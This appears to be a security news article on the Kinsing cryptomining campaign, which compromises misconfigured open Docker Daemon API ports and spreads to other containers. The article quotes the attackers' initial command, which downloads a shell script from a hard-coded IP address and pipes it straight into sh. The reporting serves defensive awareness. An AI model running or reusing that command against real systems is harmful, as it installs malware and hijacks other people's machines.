image
The Docker cloud containerization technology is under fire, with an organized, self-propagating cryptomining campaign targeting misconfigured open Docker Daemon API ports. Thousands of container-compromise attempts are being observed every day as part of the campaign, according to Gal Singer, a security researcher at AquaSec. The effort has been ongoing for months. However, since the beginning of the year, the number of daily attempts has far exceeded what was seen before, he said. “We…believe that these attacks are directed by actors with sufficient resources and the infrastructure needed to carry out and sustain such attacks, and that this is not an improvised endeavor,” he wrote, in an analysis posted on Friday. Kinsing’s Infection Routine The attack pattern starts with the attackers identifying a misconfigured Docker API port that has been left open to the public internet. They then access that open port and the Docker instance connected to it, and run a rogue Ubuntu container. The container issues a command that fetches the Kinsing malware, which in turn downloads and runs a cryptominer. In the final stage of the infection, Kinsing attempts to propagate to other containers and hosts. Click to enlarge: A summary of the attack components. Source: AquaSec. The same initial command is used in every attack, according to Singer: “/bin/bash -c apt-get update && apt-get install -y wget cron;service cron start; wget -q -O – 142.44.191.122/d.sh | sh;tail -f /dev/null.” This…

Source